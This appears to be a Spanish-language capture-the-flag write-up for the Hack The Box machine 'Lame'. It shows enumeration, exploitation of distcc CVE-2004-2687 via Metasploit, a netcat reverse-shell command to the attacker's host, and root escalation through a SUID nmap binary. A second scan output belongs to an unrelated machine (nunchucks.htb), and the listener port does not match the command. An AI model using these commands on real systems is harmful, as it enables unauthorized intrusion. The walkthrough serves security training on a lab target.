Lame
Lame
Skills
- Nmap SUID exploitation
- Distcc exploitation [CVE-2004-2687]
Certificaciones
- eJPT
Descripción
Lame es una máquina easy linux donde estaremos vulnerando la máquina a través de una vulnerabilidad en el servicio de Distcc, obteniendo así, acceso a la máquina víctima. Escalaremos privilegios mediante un binario SUID convirtiéndonos en usuario root
Reconocimiento
Se comprueba que la máquina está activa y se determina su sistema operativo, el ttl de las máquinas linux suele ser 64, en este caso hay un nodo intermediario que hace que el ttl disminuya en una unidad
1
2
3
4
5
6
7
8
# ping 10.129.251.62
PING 10.129.251.62 (10.129.251.62) 56(84) bytes of data.
64 bytes from 10.129.251.62: icmp_seq=1 ttl=63 time=62.6 ms
64 bytes from 10.129.251.62: icmp_seq=2 ttl=63 time=65.6 ms
^C
--- 10.129.251.62 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 62.561/64.096/65.632/1.535 ms
Nmap
Se va a realizar un escaneo de todos los puertos abiertos en el protocolo TCP a través de nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
# nmap -sC -sV -p21,22,139,445,3632 10.129.251.62 -Pn -oN services
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-04 21:05 CEST
Nmap scan report for 10.129.251.62
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.16.15
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2024-07-04T15:06:32-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 2h00m50s, deviation: 2h49m46s, median: 47s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.92 seconds
Se procede a realizar un análisis de detección de servicios y la identificación de versiones utilizando los puertos abiertos encontrados
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# nmap -sCV -p22,80,443 10.129.95.252 -oN services
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-03 13:14 CEST
Nmap scan report for 10.129.95.252
Host is up (0.084s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6c:14:6d:bb:74:59:c3:78:2e:48:f5:11:d8:5b:47:21 (RSA)
| 256 a2:f4:2c:42:74:65:a3:7c:26:dd:49:72:23:82:72:71 (ECDSA)
|_ 256 e1:8d:44:e7:21:6d:7c:13:2f:ea:3b:83:58:aa:02:b3 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://nunchucks.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
| tls-nextprotoneg:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=nunchucks.htb/organizationName=Nunchucks-Certificates/stateOrProvinceName=Dorset/countryName=UK
| Subject Alternative Name: DNS:localhost, DNS:nunchucks.htb
| Not valid before: 2021-08-30T15:42:24
|_Not valid after: 2031-08-28T15:42:24
|_http-title: Nunchucks - Landing Page
| tls-alpn:
|_ http/1.1
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.69 seconds
Ftp Enumeration
Examinamos el ftp pero no encontramos nada
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# ftp 10.129.251.62
Connected to 10.129.251.62.
220 (vsFTPd 2.3.4)
Name (10.129.251.62:justice-reaper): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -a
229 Entering Extended Passive Mode (|||13756|).
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
ftp>
ftp> exi
221 Goodbye.
Smb Enumeration
Nos descargamos los archivos pero no hay nada interesante
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# smbclient --no-pass //10.129.251.62/tmp
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 4 21:18:55 2024
.. DR 0 Sat Oct 31 07:33:58 2020
5632.jsvc_up R 0 Thu Jul 4 15:52:33 2024
.ICE-unix DH 0 Thu Jul 4 15:51:22 2024
vmware-root DR 0 Thu Jul 4 15:52:09 2024
.X11-unix DH 0 Thu Jul 4 15:51:47 2024
.X0-lock HR 11 Thu Jul 4 15:51:47 2024
vgauthsvclog.txt.0 R 1600 Thu Jul 4 15:51:20 2024
7282168 blocks of size 1024. 5385828 blocks available
smb: \> prompt OFF
smb: \> recurse ON
smb: \> mget *
NT_STATUS_ACCESS_DENIED opening remote file \5632.jsvc_up
getting file \.X0-lock of size 11 as .X0-lock (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \vgauthsvclog.txt.0 of size 1600 as vgauthsvclog.txt.0 (4.1 KiloBytes/sec) (average 2.6 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED listing \vmware-root\*
NT_STATUS_ACCESS_DENIED opening remote file \.X11-unix\X0
smb: \> exit
Distcc Enumeration
Al enumerar distcc descubrimos que es vulnerable al CVE-2004-2687
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# nmap -p 3632 10.129.251.62 --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'" -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-04 21:27 CEST
Nmap scan report for 10.129.251.62
Host is up (0.063s latency).
PORT STATE SERVICE
3632/tcp open distccd
| distcc-cve2004-2687:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004-2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002-02-01
| Extra information:
|
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
| References:
| https://nvd.nist.gov/vuln/detail/CVE-2004-2687
| https://distcc.github.io/security.html
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds
Distcc Exploitation
Vamos a utilizar metasploit para ganar acceso a la máquina víctima
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# msfconsole
msf6 > use exploit/unix/misc/distcc_exec
[*] No payload configured, defaulting to cmd/unix/reverse_bash
msf6 exploit(unix/misc/distcc_exec) > set PAYLOAD cmd/unix/reverse_perl
PAYLOAD => cmd/unix/reverse_perl
msf6 exploit(unix/misc/distcc_exec) > set RHOST 10.129.251.62
RHOST => 10.129.251.62
msf6 exploit(unix/misc/distcc_exec) > set LHOST 10.10.16.15
LHOST => 10.10.16.15
msf6 exploit(unix/misc/distcc_exec) > run
[*] Started reverse TCP handler on 10.10.16.15:4444
[*] Command shell session 1 opened (10.10.16.15:4444 -> 10.129.251.62:44845) at 2024-07-04 21:43:59 +0200
whoami
daemon
ls
5632.jsvc_up
vgauthsvclog.txt.0
vmware-root
Debido a que la consola que nos proporciona metasploit no es cómoda, vamos a obtener acceso mediante netcat. Para ello, ejecutamos este payload desde metasploit
1
nc -c /bin/bash 10.10.16.15 443
Nos ponemos en escucha desde nuestro equipo mediante netcat
1
2
3
4
5
6
# nc -nlvp 443
listening on [any] 4444 ...
connect to [10.10.16.15] from (UNKNOWN) [10.129.251.62] 36954
bash: cannot set terminal process group (1027): Inappropriate ioctl for device
bash: no job control in this shell
daemon@lame:/tmp$
Obtenemos las dimensiones de nuestra pantalla
1
2
# stty size
45 183
Efectuamos el tratamiento a la TTY
1
2
3
4
5
6
7
8
9
10
11
12
13
# script /dev/null -c bash
[ENTER]
[CTRL + Z]
# stty raw -echo; fg
[ENTER]
# reset xterm
[ENTER]
# export TERM=xterm
[ENTER]
# export SHELL=bash
[ENTER]
# stty rows 45 columns 183
[ENTER]
Ya tenemos un consola completamente interactiva
1
2
daemon@lame:/tmp$ whoami
daemon
Privilege Escalation
Buscamos binarios SUID y encontramos nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
daemon@lame:/tmp$ find / -perm -4000 2>/dev/null
/bin/umount
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/sbin/mount.nfs
/lib/dhcp3-client/call-dhclient-script
/usr/bin/sudoedit
/usr/bin/X
/usr/bin/netkit-rsh
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/netkit-rlogin
/usr/bin/arping
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/nmap
/usr/bin/chsh
/usr/bin/netkit-rcp
/usr/bin/passwd
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/telnetlogin
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
Mediante nmap en modo interactivo podemos spawnear una shell como usuario root
1
2
3
4
5
6
7
daemon@lame:/tmp$ nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
sh-3.2# whoami
root
Esta entrada está licenciada bajo CC BY 4.0 por el autor.